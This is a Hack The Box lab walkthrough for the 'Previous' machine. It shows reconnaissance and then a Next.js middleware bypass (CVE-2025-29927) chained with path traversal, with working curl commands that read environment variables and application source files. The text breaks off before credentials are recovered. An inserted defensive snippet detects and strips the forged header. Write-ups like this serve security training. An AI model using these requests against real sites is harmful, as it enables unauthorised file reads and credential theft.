🎯 Hack The Box: Previous - Complete Walkthrough & Technical Analysis
📊 Machine Overview
| Property | Value |
|---|---|
| Machine Name | Previous |
| IP Address | 10.10.11.83 |
| Operating System | Linux (Ubuntu) |
| Difficulty | Medium |
| Points | 30 |
| Release Date | August 23, 2025 |
| Domain | previous.htb |
🔍 Initial Reconnaissance
Port Scanning with Nmap
The first step in any penetration test is reconnaissance. We begin by scanning the target to identify open ports and services.

```bash
nmap -sC -sV -oN nmap_initial.txt 10.10.11.83
```

Key Findings:
- Port 22 (SSH): OpenSSH 8.9p1 Ubuntu - Standard SSH service for remote access
- Port 80 (HTTP): nginx 1.18.0 - Web server with automatic redirect to http://previous.htb/
DNS Configuration
Before proceeding, we need to add the domain to our hosts file:
```bash
echo "10.10.11.83 previous.htb" | sudo tee -a /etc/hosts
```
This ensures our system can resolve the domain name properly.
🌐 Web Application Analysis
Technology Stack Identification
Using `whatweb` to fingerprint the web application:

```bash
whatweb http://previous.htb
```
Critical Discovery: The application is running Next.js (a React framework) on Node.js. This matters because Next.js applications have framework-specific vulnerabilities and attack vectors, and it tells us which CVEs to check against the deployed version.
HTTP Header Analysis
```bash
curl -I http://previous.htb/
```

Response Headers Reveal:

```http
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
X-Powered-By: Next.js
X-Middleware-Subrequest: src/middleware:nowaf:src/middleware...
```

The `X-Middleware-Subrequest` header is particularly interesting - it suggests the application uses middleware layers that might be exploitable.
Directory Enumeration
```bash
feroxbuster -u http://previous.htb/ \
  -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
  -x php,html,js,json,txt,log \
  -t 50 -e
```

Important Finding: Email address discovered - [email protected] (potential username for later)

We check the website headers ✅

Since it's Next.js, it might be vulnerable to CVE-2025-29927 (PoC exists) depending on the version/config.
💥 Vulnerability Discovery: CVE-2025-29927
Understanding the Vulnerability
CVE-2025-29927 is a vulnerability in Next.js middleware handling; on this target it is chained with a path traversal in an API endpoint so that an attacker can read arbitrary files from the server when the following conditions are met:
- The application has an API endpoint that accepts file parameters
- The middleware doesn't properly sanitize user input
- The `X-Middleware-Subrequest` header can be manipulated
Why This Works
Next.js middleware is designed to process requests before they reach the actual API endpoints. The `X-Middleware-Subrequest` header is meant for Next.js's own internal sub-requests; by supplying a crafted copy of it from the client side, we make the framework treat our request as one that has already passed through the middleware chain, so the middleware is skipped and the security controls it enforces are bypassed.
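A defender-side check for the header described above, added here as an example and not part of the original walkthrough: it flags inbound requests that carry the internal `x-middleware-subrequest` header and shows how a reverse proxy would strip it before the application sees it. The request records and the repeat threshold logic are constructed for the demo.

```javascript
// Added example (not code from the walkthrough or from Next.js): flag and
// strip the internal x-middleware-subrequest header on client requests.
// Request records below are constructed for the demo.
const INTERNAL_HEADER = 'x-middleware-subrequest';

function maxRepeatedSegment(value) {
  const counts = new Map();
  for (const seg of value.split(':').filter(Boolean)) {
    counts.set(seg, (counts.get(seg) || 0) + 1);
  }
  return Math.max(0, ...counts.values());
}

// Returns a finding for one request, or null when the header is absent.
// Next.js sets this header only on its own internal sub-requests, so any
// client-supplied copy is suspicious; five repeats of one segment is the
// recursion limit at which vulnerable versions skip middleware entirely.
function inspectRequest(req) {
  const value = req.headers[INTERNAL_HEADER];
  if (value === undefined) return null;
  return {
    ip: req.ip,
    path: req.path,
    header: value,
    likelyBypass: maxRepeatedSegment(value) >= 5,
  };
}

// What the reverse proxy in front of port 3000 should do: drop the header so
// the application never sees a client-controlled value.
function stripInternalHeaders(req) {
  const headers = { ...req.headers };
  delete headers[INTERNAL_HEADER];
  return { ...req, headers };
}

function findBypassAttempts(requests) {
  return requests.map(inspectRequest).filter((f) => f !== null && f.likelyBypass);
}

// Constructed sample traffic: one ordinary request and one bypass attempt.
const SAMPLE_REQUESTS = [
  { ip: '10.10.14.5', path: '/api/download?example=report.pdf', headers: { host: 'previous.htb' } },
  { ip: '10.10.14.9', path: '/api/download?example=../../../../../../proc/self/environ',
    headers: { host: 'previous.htb', [INTERNAL_HEADER]: 'middleware:middleware:middleware:middleware:middleware' } },
];

for (const finding of findBypassAttempts(SAMPLE_REQUESTS)) {
  console.log('ALERT middleware bypass attempt:', JSON.stringify(finding));
}
```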
🔓 Exploitation Phase 1: Information Gathering
Step 1: Discovering the Vulnerable Endpoint
We need to find API endpoints. The `/api/` directory is standard in Next.js applications:

```bash
dirsearch -u http://previous.htb/api/ \
  -w /usr/share/wordlists/dirb/common.txt \
  -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware"
```

Result: Found the `/api/download` endpoint
Step 2: Reading Environment Variables
Environment variables often contain sensitive information like API keys, database credentials, or configuration details:
```bash
curl -s "http://previous.htb/api/download?example=../../../../../../proc/self/environ" \
  -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
  | tr '\0' '\n'
```

Why `/proc/self/environ`?
- In Linux, `/proc/self/` is a symlink to the `/proc/<pid>/` directory of the current process (here, the Node.js server handling our request), and `environ` inside it contains all environment variables for that process
- The `tr '\0' '\n'` command converts the null-byte separators to newlines for readability

Critical Information Extracted:
- `NODE_ENV=production` - Application is in production mode
- `PWD=/app` - Application root directory
- `PORT=3000` - Internal port (nginx proxies to this)
- `HOME=/home/nextjs` - Service user's home directory
Step 3: Extracting Application Source Code
Now that we know the app lives in `/app`, let's get the server configuration:

```bash
curl -s "http://previous.htb/api/download?example=../../../../../../app/server.js" \
  -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware"
```
This reveals how the Next.js server is configured and initialized.
Step 4: Mapping Application Routes
Next.js stores routing information in manifest files:
```bash
curl -s "http://previous.htb/api/download?example=../../../../../../app/.next/routes-manifest.json" \
  -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware"
```

Key Discovery: Dynamic route `/api/auth/[...nextauth]` - This is a NextAuth.js authentication endpoint!
🔐 Exploitation Phase 2: Credential Discovery
Understanding NextAuth.js
NextAuth.js is a popular authentication library for Next.js applications. It handles:
- User authentication
- Session management
- OAuth providers
- Credential-based authentication
Extracting the Authentication Logic
The route `[...nextauth]` uses bracket notation, which needs URL encoding:

```bash
curl -s "http://previous.htb/api/download?example=../../../../../../app/.next/server/pages/api/auth/%5B...nextauth%5D.js" \
  -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware"
```
Analyzing the Minified Code
The response is minified JavaScript, but we can identify the critical authentication logic: